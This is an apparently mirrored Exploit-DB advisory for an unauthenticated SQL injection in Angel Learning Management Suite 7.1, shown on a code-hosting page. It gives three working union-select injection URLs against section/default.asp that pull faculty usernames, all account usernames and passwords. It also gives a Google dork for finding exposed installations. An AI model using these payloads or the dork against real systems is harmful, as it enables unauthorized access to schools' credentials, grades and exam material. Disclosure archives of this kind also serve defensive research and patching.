bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/asp/webapps/3390.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

61 lines
No EOL
2.1 KiB
Text
Raw Permalink Blame History

#########################################################################
#
# Application:
#
# Angel Learning Management Suite 7.1
# http://www.angellearning.com
#
#########################################################################
#
# Description:
#
# "ANGEL LMS is an inclusive suite of enterprise
# learning management tools that balances ease of
# use with powerful capabilities to deliver leading
# edge teaching and learning, impact learner success
# and measure effectiveness."
#
# Basically, Angel is a CMS for education, providing
# online forums, grading, email, chat, etc to faculty
# and students. It is used as the primary Web interface
# for several online schools and courses.
#
#########################################################################
#
# Vulnerability:
#
# Angel 7.1 contains an SQL injection vulnerability in
# section/default.asp that grants an un-authenticated user
# access to all database tables and data. Examples include
# enumeration of tables, columns, user names, passwords,
# grades, and test questions/answers (you basically have
# access to everything).
#
#########################################################################
#
# Exploit Examples:
#
# #Enumerate Faculty User Accounts#
# http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20faculty_accounts--"
#
# #Enumerate All User Accounts#
# http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"
#
# #Enumerate Account Passwords#
# http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"
#
#########################################################################
#
# Google Dork:
# intext:"2006 angel learning, inc" -pdf
#
#########################################################################
#
# Credit:
# Exploit discovered and coded by Craig Heffner
# heffnercj [at] gmail.com
# http://www.craigheffner.com
#
#########################################################################
# milw0rm.com [2007-03-01]
Reference in a new issue View git blame Copy permalink